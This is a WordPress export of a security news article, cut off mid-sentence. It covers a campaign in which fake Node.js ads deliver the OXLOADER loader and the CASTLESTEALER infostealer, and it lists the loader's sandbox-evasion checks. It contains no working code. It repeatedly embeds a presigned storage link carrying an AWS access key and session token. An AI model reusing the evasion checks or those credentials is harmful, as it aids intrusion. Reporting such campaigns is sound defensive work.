{"id":13776,"date":"2026-06-22T10:03:51","date_gmt":"2026-06-22T10:03:51","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2026\/06\/22\/hackers-impersonate-node-js-installer-in-google-ads-to-deploy-infostealer-malware\/"},"modified":"2026-06-22T10:03:51","modified_gmt":"2026-06-22T10:03:51","slug":"hackers-impersonate-node-js-installer-in-google-ads-to-deploy-infostealer-malware","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2026\/06\/22\/hackers-impersonate-node-js-installer-in-google-ads-to-deploy-infostealer-malware\/","title":{"rendered":"Hackers Impersonate Node.js Installer in Google Ads to Deploy Infostealer Malware"},"content":{"rendered":"<p>    Hackers Impersonate Node.js Installer in Google Ads to Deploy Infostealer Malware<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p class=\"wp-block-paragraph\">Hackers are using fake Google Ads to push a brand-new malware loader that disguises itself as the popular Node.js installer. <\/p>\n<p class=\"wp-block-paragraph\">The campaign has been actively targeting Windows users in the United States, silently dropping a dangerous infostealer onto their machines after just a single click on what appears to be a legitimate sponsored search result.<a href=\"https:\/\/ppl-ai-file-upload.s3.amazonaws.com\/web\/direct-files\/attachments\/11146061\/b26ceb1b-0605-44a5-b379-3c9a0c6d2a09\/Hackers-Impersonate-Node.js-Installer-in-Google-Ads-to-Deploy-Infostealer-Malware.pdf?AWSAccessKeyId=ASIA2F3EMEYERYFNWZ2G&amp;Signature=98sOk35KC8Xt6%2BvqANpHnBKqD3w%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEDYaCXVzLWVhc3QtMSJHMEUCIBAN%2FZ%2Bs0olm6FRZyCJ8%2FSqGieRf3TbCw19bT%2FS7DIWTAiEA6MHZ8GWeckriHwsaKmHhmI538PvZKeUCLEgNF0ldGcQq%2FAQI%2Fv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARABGgw2OTk3NTMzMDk3MDUiDFQGNxpsAOrV6AIKDCrQBPrlmB6dXsSqINqlGzMwl6%2B0r5jS7V2zx7xcx0QqLVgMDS6ZTdQZAW27iAk14BNoLeYHZH%2F7diIk0nnc%2FlnI%2BFBt6tePrhST53nQ3OSYTQkva9GAQ9YEIo6%2BBEzRtcFc31ENP6KkAYYRuIXz5ZZEE5do6QIX1MmqBC%2Bzxuk%2Fhr5%2BXowrfMcy6R2cD6DjpbDCACsc%2BEw16ZiWFuH0ZB%2FlWzYHcBTzEVXaU4n4t4HyUkmpRdJWnbONgX8Lv2FkWFCnocLRUozlm0BK%2F2wi4wb5UArxn0L8H6XYWgTs%2FgMxTZccIFn1iev38KnemGAXTBTTrCk9SaPmCnW6UpxC1Q2rUYY8Tf77nJ%2FKJKNiBSQJsfto6fNSNPDaMut10UNH%2BEAQT9Bx0OIvUPBhW7oZdtq1c%2F9safEpEkQDUteLwKprarri%2BO9zfj453zt2PT30Iclz%2BO05Sl2kds0BpTWOML45%2BAGOmAaV%2B1GgC8Ox%2BURL1Jqg7FDA3ahpMMNlIMS7WcHFErJnFzcPzo2jqdOdb605F4fESKHlqu%2B%2Bq0qWG3cS6uk38Wc2vTGoBME3E9OhHiR6jTfwAtsdtjxftKegaODZ1bMrtzhWRWVxu0uPCmOOJQStvS2gq6BuyXNAWO3NxrHkA4MIYrlWgiHWs%2Fi3RlLL2XaLrhoKLEyKmHyXxqr8xrbSf0gTTb%2BHd8%2BaTr2lnjDgon93AdmdR%2Bvz1wjdTKqA8cqfKi2t4mIKxLgEQcExDmqiByHzUmOOeppHKBZA3jYHfydjOFi4NMYgMcstMeYqapswhIrj0QY6mAGUZQmVG5dkhN%2BQN4R0Ry9FKvKvAROj9cc3ZjXLEglJyRehEBWIZQ9F9921YfBwskRk0pPoFEJvzqk8Osz6O03bOSFinOrZ%2FH6kL8cjLJ3PVxWsVRehB3kQGGXHT6zYkRcBlTOXYovRetBlOU5qft1k9JZ57ixOVlLU90nZVc4%2Bl9dRKAAqVN8p7MQPurRFx%2BAd0fOrl1v73g%3D%3D&amp;Expires=1782108887\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<p class=\"wp-block-paragraph\">The attack takes advantage of something millions of people do every day, searching for software online and trusting the top results. In this case, threat actors set up a malicious landing page built to look like an official Node.js platform. <\/p>\n<p class=\"wp-block-paragraph\">When a victim clicked the sponsored ad, they were quietly redirected through an intermediary domain to download a malicious Windows batch script hosted on a legitimate cloud file-sharing service, making it much harder for security tools to flag it.<a href=\"https:\/\/ppl-ai-file-upload.s3.amazonaws.com\/web\/direct-files\/attachments\/11146061\/b26ceb1b-0605-44a5-b379-3c9a0c6d2a09\/Hackers-Impersonate-Node.js-Installer-in-Google-Ads-to-Deploy-Infostealer-Malware.pdf?AWSAccessKeyId=ASIA2F3EMEYERYFNWZ2G&amp;Signature=98sOk35KC8Xt6%2BvqANpHnBKqD3w%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEDYaCXVzLWVhc3QtMSJHMEUCIBAN%2FZ%2Bs0olm6FRZyCJ8%2FSqGieRf3TbCw19bT%2FS7DIWTAiEA6MHZ8GWeckriHwsaKmHhmI538PvZKeUCLEgNF0ldGcQq%2FAQI%2Fv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARABGgw2OTk3NTMzMDk3MDUiDFQGNxpsAOrV6AIKDCrQBPrlmB6dXsSqINqlGzMwl6%2B0r5jS7V2zx7xcx0QqLVgMDS6ZTdQZAW27iAk14BNoLeYHZH%2F7diIk0nnc%2FlnI%2BFBt6tePrhST53nQ3OSYTQkva9GAQ9YEIo6%2BBEzRtcFc31ENP6KkAYYRuIXz5ZZEE5do6QIX1MmqBC%2Bzxuk%2Fhr5%2BXowrfMcy6R2cD6DjpbDCACsc%2BEw16ZiWFuH0ZB%2FlWzYHcBTzEVXaU4n4t4HyUkmpRdJWnbONgX8Lv2FkWFCnocLRUozlm0BK%2F2wi4wb5UArxn0L8H6XYWgTs%2FgMxTZccIFn1iev38KnemGAXTBTTrCk9SaPmCnW6UpxC1Q2rUYY8Tf77nJ%2FKJKNiBSQJsfto6fNSNPDaMut10UNH%2BEAQT9Bx0OIvUPBhW7oZdtq1c%2F9safEpEkQDUteLwKprarri%2BO9zfj453zt2PT30Iclz%2BO05Sl2kds0BpTWOML45%2BAGOmAaV%2B1GgC8Ox%2BURL1Jqg7FDA3ahpMMNlIMS7WcHFErJnFzcPzo2jqdOdb605F4fESKHlqu%2B%2Bq0qWG3cS6uk38Wc2vTGoBME3E9OhHiR6jTfwAtsdtjxftKegaODZ1bMrtzhWRWVxu0uPCmOOJQStvS2gq6BuyXNAWO3NxrHkA4MIYrlWgiHWs%2Fi3RlLL2XaLrhoKLEyKmHyXxqr8xrbSf0gTTb%2BHd8%2BaTr2lnjDgon93AdmdR%2Bvz1wjdTKqA8cqfKi2t4mIKxLgEQcExDmqiByHzUmOOeppHKBZA3jYHfydjOFi4NMYgMcstMeYqapswhIrj0QY6mAGUZQmVG5dkhN%2BQN4R0Ry9FKvKvAROj9cc3ZjXLEglJyRehEBWIZQ9F9921YfBwskRk0pPoFEJvzqk8Osz6O03bOSFinOrZ%2FH6kL8cjLJ3PVxWsVRehB3kQGGXHT6zYkRcBlTOXYovRetBlOU5qft1k9JZ57ixOVlLU90nZVc4%2Bl9dRKAAqVN8p7MQPurRFx%2BAd0fOrl1v73g%3D%3D&amp;Expires=1782108887\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<p class=\"wp-block-paragraph\">Researchers at Elastic Security Labs identified this active campaign and confirmed it was targeting one of their own customers.\u00a0<\/p>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.elastic.co\/security-labs\/oxloader-malware-loader-infostealer\" id=\"https:\/\/www.elastic.co\/security-labs\/oxloader-malware-loader-infostealer\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Elastic Security Labs\u00a0said in a report<\/a> shared with Cyber Security News (CSN) that the loader, now tracked as OXLOADER, had not been publicly documented before and was operating with remarkably low detection rates across both static antivirus engines and automated sandbox environments.<a href=\"https:\/\/ppl-ai-file-upload.s3.amazonaws.com\/web\/direct-files\/attachments\/11146061\/b26ceb1b-0605-44a5-b379-3c9a0c6d2a09\/Hackers-Impersonate-Node.js-Installer-in-Google-Ads-to-Deploy-Infostealer-Malware.pdf?AWSAccessKeyId=ASIA2F3EMEYERYFNWZ2G&amp;Signature=98sOk35KC8Xt6%2BvqANpHnBKqD3w%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEDYaCXVzLWVhc3QtMSJHMEUCIBAN%2FZ%2Bs0olm6FRZyCJ8%2FSqGieRf3TbCw19bT%2FS7DIWTAiEA6MHZ8GWeckriHwsaKmHhmI538PvZKeUCLEgNF0ldGcQq%2FAQI%2Fv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARABGgw2OTk3NTMzMDk3MDUiDFQGNxpsAOrV6AIKDCrQBPrlmB6dXsSqINqlGzMwl6%2B0r5jS7V2zx7xcx0QqLVgMDS6ZTdQZAW27iAk14BNoLeYHZH%2F7diIk0nnc%2FlnI%2BFBt6tePrhST53nQ3OSYTQkva9GAQ9YEIo6%2BBEzRtcFc31ENP6KkAYYRuIXz5ZZEE5do6QIX1MmqBC%2Bzxuk%2Fhr5%2BXowrfMcy6R2cD6DjpbDCACsc%2BEw16ZiWFuH0ZB%2FlWzYHcBTzEVXaU4n4t4HyUkmpRdJWnbONgX8Lv2FkWFCnocLRUozlm0BK%2F2wi4wb5UArxn0L8H6XYWgTs%2FgMxTZccIFn1iev38KnemGAXTBTTrCk9SaPmCnW6UpxC1Q2rUYY8Tf77nJ%2FKJKNiBSQJsfto6fNSNPDaMut10UNH%2BEAQT9Bx0OIvUPBhW7oZdtq1c%2F9safEpEkQDUteLwKprarri%2BO9zfj453zt2PT30Iclz%2BO05Sl2kds0BpTWOML45%2BAGOmAaV%2B1GgC8Ox%2BURL1Jqg7FDA3ahpMMNlIMS7WcHFErJnFzcPzo2jqdOdb605F4fESKHlqu%2B%2Bq0qWG3cS6uk38Wc2vTGoBME3E9OhHiR6jTfwAtsdtjxftKegaODZ1bMrtzhWRWVxu0uPCmOOJQStvS2gq6BuyXNAWO3NxrHkA4MIYrlWgiHWs%2Fi3RlLL2XaLrhoKLEyKmHyXxqr8xrbSf0gTTb%2BHd8%2BaTr2lnjDgon93AdmdR%2Bvz1wjdTKqA8cqfKi2t4mIKxLgEQcExDmqiByHzUmOOeppHKBZA3jYHfydjOFi4NMYgMcstMeYqapswhIrj0QY6mAGUZQmVG5dkhN%2BQN4R0Ry9FKvKvAROj9cc3ZjXLEglJyRehEBWIZQ9F9921YfBwskRk0pPoFEJvzqk8Osz6O03bOSFinOrZ%2FH6kL8cjLJ3PVxWsVRehB3kQGGXHT6zYkRcBlTOXYovRetBlOU5qft1k9JZ57ixOVlLU90nZVc4%2Bl9dRKAAqVN8p7MQPurRFx%2BAd0fOrl1v73g%3D%3D&amp;Expires=1782108887\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<p class=\"wp-block-paragraph\">The campaign ran through Google Ads and the malicious advertiser account was registered under a verified name linked to Ukraine. <\/p>\n<p class=\"wp-block-paragraph\">The last time the ad appeared was April 23, 2026, and by May 14, 2026, Google had removed the advertiser and all associated campaigns entirely. <\/p>\n<p class=\"wp-block-paragraph\">What makes this attack particularly concerning is how seamlessly the threat actor blended into trusted platforms to deliver their payload without raising alarms.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiUiCcke-O5AtRW2y9AkAbCmDwQpWt7Egzafm4yg76zwE4iYIWdW3ybqVEGU_ErHiRGR9zLzdHQFcgXeGfPluvJ5B8sMaUcYHNXQIchlfaPQt-yO4tWRqGfgDJ_ThxWQxj4y_wFmeqav-EbxQ__FELB29Rww67wo8T9au9vufs9ucPMyUeXAxI94wind0E\/s16000\/Advertiser%27s%2520profile%2520on%2520Google%2520Ads%2520Transparency%2520Center%2520%28Source%2520-%2520Elastic%29.webp?ssl=1\" alt=\"Advertiser's profile on Google Ads Transparency Center (Source - Elastic)\"><figcaption class=\"wp-element-caption\">Advertiser\u2019s profile on Google Ads Transparency Center (Source \u2013 Elastic)<\/figcaption><\/figure>\n<\/div>\n<p class=\"wp-block-paragraph\">The final payload delivered through this chain is an infostealer called CASTLESTEALER, a .NET-based malware capable of harvesting sensitive data from infected systems. <\/p>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/cybersecuritynews.com\/aligning-it-and-security-teams\/\" id=\"108197\" target=\"_blank\" rel=\"noreferrer noopener\">Security teams should treat sponsored search results for developer tools with extra scrutiny<\/a>, ensure endpoint behavioral detection is active rather than just set to monitor mode, and always verify software downloads directly against official vendor websites.<a href=\"https:\/\/ppl-ai-file-upload.s3.amazonaws.com\/web\/direct-files\/attachments\/11146061\/b26ceb1b-0605-44a5-b379-3c9a0c6d2a09\/Hackers-Impersonate-Node.js-Installer-in-Google-Ads-to-Deploy-Infostealer-Malware.pdf?AWSAccessKeyId=ASIA2F3EMEYERYFNWZ2G&amp;Signature=98sOk35KC8Xt6%2BvqANpHnBKqD3w%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEDYaCXVzLWVhc3QtMSJHMEUCIBAN%2FZ%2Bs0olm6FRZyCJ8%2FSqGieRf3TbCw19bT%2FS7DIWTAiEA6MHZ8GWeckriHwsaKmHhmI538PvZKeUCLEgNF0ldGcQq%2FAQI%2Fv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARABGgw2OTk3NTMzMDk3MDUiDFQGNxpsAOrV6AIKDCrQBPrlmB6dXsSqINqlGzMwl6%2B0r5jS7V2zx7xcx0QqLVgMDS6ZTdQZAW27iAk14BNoLeYHZH%2F7diIk0nnc%2FlnI%2BFBt6tePrhST53nQ3OSYTQkva9GAQ9YEIo6%2BBEzRtcFc31ENP6KkAYYRuIXz5ZZEE5do6QIX1MmqBC%2Bzxuk%2Fhr5%2BXowrfMcy6R2cD6DjpbDCACsc%2BEw16ZiWFuH0ZB%2FlWzYHcBTzEVXaU4n4t4HyUkmpRdJWnbONgX8Lv2FkWFCnocLRUozlm0BK%2F2wi4wb5UArxn0L8H6XYWgTs%2FgMxTZccIFn1iev38KnemGAXTBTTrCk9SaPmCnW6UpxC1Q2rUYY8Tf77nJ%2FKJKNiBSQJsfto6fNSNPDaMut10UNH%2BEAQT9Bx0OIvUPBhW7oZdtq1c%2F9safEpEkQDUteLwKprarri%2BO9zfj453zt2PT30Iclz%2BO05Sl2kds0BpTWOML45%2BAGOmAaV%2B1GgC8Ox%2BURL1Jqg7FDA3ahpMMNlIMS7WcHFErJnFzcPzo2jqdOdb605F4fESKHlqu%2B%2Bq0qWG3cS6uk38Wc2vTGoBME3E9OhHiR6jTfwAtsdtjxftKegaODZ1bMrtzhWRWVxu0uPCmOOJQStvS2gq6BuyXNAWO3NxrHkA4MIYrlWgiHWs%2Fi3RlLL2XaLrhoKLEyKmHyXxqr8xrbSf0gTTb%2BHd8%2BaTr2lnjDgon93AdmdR%2Bvz1wjdTKqA8cqfKi2t4mIKxLgEQcExDmqiByHzUmOOeppHKBZA3jYHfydjOFi4NMYgMcstMeYqapswhIrj0QY6mAGUZQmVG5dkhN%2BQN4R0Ry9FKvKvAROj9cc3ZjXLEglJyRehEBWIZQ9F9921YfBwskRk0pPoFEJvzqk8Osz6O03bOSFinOrZ%2FH6kL8cjLJ3PVxWsVRehB3kQGGXHT6zYkRcBlTOXYovRetBlOU5qft1k9JZ57ixOVlLU90nZVc4%2Bl9dRKAAqVN8p7MQPurRFx%2BAd0fOrl1v73g%3D%3D&amp;Expires=1782108887\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<h2 id=\"h-hackers-impersonate-node-js-installer-in-google-ads\" class=\"wp-block-heading\"><strong>Hackers Impersonate Node.js Installer in Google Ads<\/strong><\/h2>\n<p class=\"wp-block-paragraph\">The infection chain begins when a user searches for the Node.js installer and clicks a sponsored result. That click sends the victim to a fake landing page built to mimic the real Node.js environment. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgFZa6r3wPpmpmgVxiGXChmIsmgjqrpCsHwlU2BvxZ4RYaQ5ec_YkxvFRM3W0gg2lEy7GnFjr1OvOE4uyueeEx6_WSlp2rHc-N8SW6oox0kk0Y4D2SGEo4UBxI3sRQd0ge6cdFr_hoXRjelXwMbfO8sxUc8kD-PoRlBBUnBPir1tJYk4OyYTu1-NGx9nY8\/s16000\/Batch%2520script%2520downloading%2520and%2520launching%2520OXLOADER%2520%28Source%2520-%2520Elastic%29.webp?ssl=1\" alt=\"Batch script downloading and launching OXLOADER (Source - Elastic)\"><figcaption class=\"wp-element-caption\">Batch script downloading and launching OXLOADER (Source \u2013 Elastic)<\/figcaption><\/figure>\n<\/div>\n<p class=\"wp-block-paragraph\">From there, a redirect through an intermediary domain delivers a batch script hosted on Storj, a legitimate cloud storage service the threat actors deliberately abused to bypass reputation-based filtering.<a href=\"https:\/\/ppl-ai-file-upload.s3.amazonaws.com\/web\/direct-files\/attachments\/11146061\/b26ceb1b-0605-44a5-b379-3c9a0c6d2a09\/Hackers-Impersonate-Node.js-Installer-in-Google-Ads-to-Deploy-Infostealer-Malware.pdf?AWSAccessKeyId=ASIA2F3EMEYERYFNWZ2G&amp;Signature=98sOk35KC8Xt6%2BvqANpHnBKqD3w%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEDYaCXVzLWVhc3QtMSJHMEUCIBAN%2FZ%2Bs0olm6FRZyCJ8%2FSqGieRf3TbCw19bT%2FS7DIWTAiEA6MHZ8GWeckriHwsaKmHhmI538PvZKeUCLEgNF0ldGcQq%2FAQI%2Fv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARABGgw2OTk3NTMzMDk3MDUiDFQGNxpsAOrV6AIKDCrQBPrlmB6dXsSqINqlGzMwl6%2B0r5jS7V2zx7xcx0QqLVgMDS6ZTdQZAW27iAk14BNoLeYHZH%2F7diIk0nnc%2FlnI%2BFBt6tePrhST53nQ3OSYTQkva9GAQ9YEIo6%2BBEzRtcFc31ENP6KkAYYRuIXz5ZZEE5do6QIX1MmqBC%2Bzxuk%2Fhr5%2BXowrfMcy6R2cD6DjpbDCACsc%2BEw16ZiWFuH0ZB%2FlWzYHcBTzEVXaU4n4t4HyUkmpRdJWnbONgX8Lv2FkWFCnocLRUozlm0BK%2F2wi4wb5UArxn0L8H6XYWgTs%2FgMxTZccIFn1iev38KnemGAXTBTTrCk9SaPmCnW6UpxC1Q2rUYY8Tf77nJ%2FKJKNiBSQJsfto6fNSNPDaMut10UNH%2BEAQT9Bx0OIvUPBhW7oZdtq1c%2F9safEpEkQDUteLwKprarri%2BO9zfj453zt2PT30Iclz%2BO05Sl2kds0BpTWOML45%2BAGOmAaV%2B1GgC8Ox%2BURL1Jqg7FDA3ahpMMNlIMS7WcHFErJnFzcPzo2jqdOdb605F4fESKHlqu%2B%2Bq0qWG3cS6uk38Wc2vTGoBME3E9OhHiR6jTfwAtsdtjxftKegaODZ1bMrtzhWRWVxu0uPCmOOJQStvS2gq6BuyXNAWO3NxrHkA4MIYrlWgiHWs%2Fi3RlLL2XaLrhoKLEyKmHyXxqr8xrbSf0gTTb%2BHd8%2BaTr2lnjDgon93AdmdR%2Bvz1wjdTKqA8cqfKi2t4mIKxLgEQcExDmqiByHzUmOOeppHKBZA3jYHfydjOFi4NMYgMcstMeYqapswhIrj0QY6mAGUZQmVG5dkhN%2BQN4R0Ry9FKvKvAROj9cc3ZjXLEglJyRehEBWIZQ9F9921YfBwskRk0pPoFEJvzqk8Osz6O03bOSFinOrZ%2FH6kL8cjLJ3PVxWsVRehB3kQGGXHT6zYkRcBlTOXYovRetBlOU5qft1k9JZ57ixOVlLU90nZVc4%2Bl9dRKAAqVN8p7MQPurRFx%2BAd0fOrl1v73g%3D%3D&amp;Expires=1782108887\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<p class=\"wp-block-paragraph\">The batch script goes a step further by <a href=\"https:\/\/cybersecuritynews.com\/malware-from-fake-software-developers-job-offers-scheme\/\" id=\"57994\" target=\"_blank\" rel=\"noreferrer noopener\">displaying a convincing fake software installation wizard<\/a>, giving the victim no reason to suspect anything is wrong. <\/p>\n<p class=\"wp-block-paragraph\">Behind that interface, it is silently downloading the next-stage executable using PowerShell and triggering a Windows User Account Control prompt to gain elevated system access. The entire experience is designed to feel like a routine software install.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiMzln4RVzZPZjh_hjB_PMa_5zS4FgETu1MSNpBjn4PRrSP37UHma7Bwe0TN3HyYCfVArr1L1nZDSXoW3FAJHZkrdr69dvKExhcPeyRqGm6bkXay9dA6H3x9wtOQIBdnsh7PusDE7l4_5zgkYVj_MhyphenhyphenUNHp8oTPg4UevYscYV0WdnndBbC0Xqeq10BDi3I\/s16000\/Elastic%2520Defend%2520alerts%2520triggered%2520upon%2520script%2520execution%2520%28Source%2520-%2520Elastic%29.webp?ssl=1\" alt=\"Elastic Defend alerts triggered upon script execution (Source - Elastic)\"><figcaption class=\"wp-element-caption\">Elastic Defend alerts triggered upon script execution (Source \u2013 Elastic)<\/figcaption><\/figure>\n<\/div>\n<p class=\"wp-block-paragraph\">A second variant of OXLOADER was also discovered on May 13, 2026, this time masquerading as a Node.js installer binary rather than API Monitor, though the underlying loader mechanism was completely identical. <\/p>\n<p class=\"wp-block-paragraph\">Researchers noted that the file retained the word \u201cnode\u201d in its filename, likely to maintain the lure theme the campaign relied on throughout.<a href=\"https:\/\/ppl-ai-file-upload.s3.amazonaws.com\/web\/direct-files\/attachments\/11146061\/b26ceb1b-0605-44a5-b379-3c9a0c6d2a09\/Hackers-Impersonate-Node.js-Installer-in-Google-Ads-to-Deploy-Infostealer-Malware.pdf?AWSAccessKeyId=ASIA2F3EMEYERYFNWZ2G&amp;Signature=98sOk35KC8Xt6%2BvqANpHnBKqD3w%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEDYaCXVzLWVhc3QtMSJHMEUCIBAN%2FZ%2Bs0olm6FRZyCJ8%2FSqGieRf3TbCw19bT%2FS7DIWTAiEA6MHZ8GWeckriHwsaKmHhmI538PvZKeUCLEgNF0ldGcQq%2FAQI%2Fv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARABGgw2OTk3NTMzMDk3MDUiDFQGNxpsAOrV6AIKDCrQBPrlmB6dXsSqINqlGzMwl6%2B0r5jS7V2zx7xcx0QqLVgMDS6ZTdQZAW27iAk14BNoLeYHZH%2F7diIk0nnc%2FlnI%2BFBt6tePrhST53nQ3OSYTQkva9GAQ9YEIo6%2BBEzRtcFc31ENP6KkAYYRuIXz5ZZEE5do6QIX1MmqBC%2Bzxuk%2Fhr5%2BXowrfMcy6R2cD6DjpbDCACsc%2BEw16ZiWFuH0ZB%2FlWzYHcBTzEVXaU4n4t4HyUkmpRdJWnbONgX8Lv2FkWFCnocLRUozlm0BK%2F2wi4wb5UArxn0L8H6XYWgTs%2FgMxTZccIFn1iev38KnemGAXTBTTrCk9SaPmCnW6UpxC1Q2rUYY8Tf77nJ%2FKJKNiBSQJsfto6fNSNPDaMut10UNH%2BEAQT9Bx0OIvUPBhW7oZdtq1c%2F9safEpEkQDUteLwKprarri%2BO9zfj453zt2PT30Iclz%2BO05Sl2kds0BpTWOML45%2BAGOmAaV%2B1GgC8Ox%2BURL1Jqg7FDA3ahpMMNlIMS7WcHFErJnFzcPzo2jqdOdb605F4fESKHlqu%2B%2Bq0qWG3cS6uk38Wc2vTGoBME3E9OhHiR6jTfwAtsdtjxftKegaODZ1bMrtzhWRWVxu0uPCmOOJQStvS2gq6BuyXNAWO3NxrHkA4MIYrlWgiHWs%2Fi3RlLL2XaLrhoKLEyKmHyXxqr8xrbSf0gTTb%2BHd8%2BaTr2lnjDgon93AdmdR%2Bvz1wjdTKqA8cqfKi2t4mIKxLgEQcExDmqiByHzUmOOeppHKBZA3jYHfydjOFi4NMYgMcstMeYqapswhIrj0QY6mAGUZQmVG5dkhN%2BQN4R0Ry9FKvKvAROj9cc3ZjXLEglJyRehEBWIZQ9F9921YfBwskRk0pPoFEJvzqk8Osz6O03bOSFinOrZ%2FH6kL8cjLJ3PVxWsVRehB3kQGGXHT6zYkRcBlTOXYovRetBlOU5qft1k9JZ57ixOVlLU90nZVc4%2Bl9dRKAAqVN8p7MQPurRFx%2BAd0fOrl1v73g%3D%3D&amp;Expires=1782108887\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<h2 id=\"h-how-oxloader-evades-detection\" class=\"wp-block-heading\"><strong>How OXLOADER Evades Detection<\/strong><\/h2>\n<p class=\"wp-block-paragraph\">OXLOADER is built with evasion as a core feature. Before executing anything meaningful, it runs five separate checks to confirm it is not running inside a sandbox or virtual machine. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjXsDGRP3ub_WFaXVciGZOJ-wK6AT3jTsJKzJE3O81ckCTS9qS4CoqL9CQv_LtHu-rWK_9QWuSD1vr8NydPHupMT8hTGfQrLyMu2Z9_LkZ_3nm9lsKZt8k7mfK7UlxwTCVHRpLZaT25zIJUXeCEGaFcYM9hv4k9nYUU4kb9eoV0xhnTl1LEp5cVlx9c7r4\/s16000\/Infection%2520chain%2520execution%2520graph%2520%28Source%2520-%2520Elastic%29.webp?ssl=1\" alt=\"Infection chain execution graph (Source - Elastic)\"><figcaption class=\"wp-element-caption\">Infection chain execution graph (Source \u2013 Elastic)<\/figcaption><\/figure>\n<\/div>\n<p class=\"wp-block-paragraph\">These include checking for at least three CPU cores, at least 3 GB of physical RAM, a display refresh rate above 20 Hz, and verifying the system is not located in a CIS region or configured for the Russian language.<a href=\"https:\/\/ppl-ai-file-upload.s3.amazonaws.com\/web\/direct-files\/attachments\/11146061\/b26ceb1b-0605-44a5-b379-3c9a0c6d2a09\/Hackers-Impersonate-Node.js-Installer-in-Google-Ads-to-Deploy-Infostealer-Malware.pdf?AWSAccessKeyId=ASIA2F3EMEYERYFNWZ2G&amp;Signature=98sOk35KC8Xt6%2BvqANpHnBKqD3w%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEDYaCXVzLWVhc3QtMSJHMEUCIBAN%2FZ%2Bs0olm6FRZyCJ8%2FSqGieRf3TbCw19bT%2FS7DIWTAiEA6MHZ8GWeckriHwsaKmHhmI538PvZKeUCLEgNF0ldGcQq%2FAQI%2Fv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARABGgw2OTk3NTMzMDk3MDUiDFQGNxpsAOrV6AIKDCrQBPrlmB6dXsSqINqlGzMwl6%2B0r5jS7V2zx7xcx0QqLVgMDS6ZTdQZAW27iAk14BNoLeYHZH%2F7diIk0nnc%2FlnI%2BFBt6tePrhST53nQ3OSYTQkva9GAQ9YEIo6%2BBEzRtcFc31ENP6KkAYYRuIXz5ZZEE5do6QIX1MmqBC%2Bzxuk%2Fhr5%2BXowrfMcy6R2cD6DjpbDCACsc%2BEw16ZiWFuH0ZB%2FlWzYHcBTzEVXaU4n4t4HyUkmpRdJWnbONgX8Lv2FkWFCnocLRUozlm0BK%2F2wi4wb5UArxn0L8H6XYWgTs%2FgMxTZccIFn1iev38KnemGAXTBTTrCk9SaPmCnW6UpxC1Q2rUYY8Tf77nJ%2FKJKNiBSQJsfto6fNSNPDaMut10UNH%2BEAQT9Bx0OIvUPBhW7oZdtq1c%2F9safEpEkQDUteLwKprarri%2BO9zfj453zt2PT30Iclz%2BO05Sl2kds0BpTWOML45%2BAGOmAaV%2B1GgC8Ox%2BURL1Jqg7FDA3ahpMMNlIMS7WcHFErJnFzcPzo2jqdOdb605F4fESKHlqu%2B%2Bq0qWG3cS6uk38Wc2vTGoBME3E9OhHiR6jTfwAtsdtjxftKegaODZ1bMrtzhWRWVxu0uPCmOOJQStvS2gq6BuyXNAWO3NxrHkA4MIYrlWgiHWs%2Fi3RlLL2XaLrhoKLEyKmHyXxqr8xrbSf0gTTb%2BHd8%2BaTr2lnjDgon93AdmdR%2Bvz1wjdTKqA8cqfKi2t4mIKxLgEQcExDmqiByHzUmOOeppHKBZA3jYHfydjOFi4NMYgMcstMeYqapswhIrj0QY6mAGUZQmVG5dkhN%2BQN4R0Ry9FKvKvAROj9cc3ZjXLEglJyRehEBWIZQ9F9921YfBwskRk0pPoFEJvzqk8Osz6O03bOSFinOrZ%2FH6kL8cjLJ3PVxWsVRehB3kQGGXHT6zYkRcBlTOXYovRetBlOU5qft1k9JZ57ixOVlLU90nZVc4%2Bl9dRKAAqVN8p7MQPurRFx%2BAd0fOrl1v73g%3D%3D&amp;Expires=1782108887\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<p class=\"wp-block-paragraph\">The loader also uses sophisticated obfuscation techniques that break standard binary analysis tools, making reverse engineering slow and difficult. <\/p>\n<p class=\"wp-block-paragraph\">It hides malicious code inside the Windows .reloc section, <a 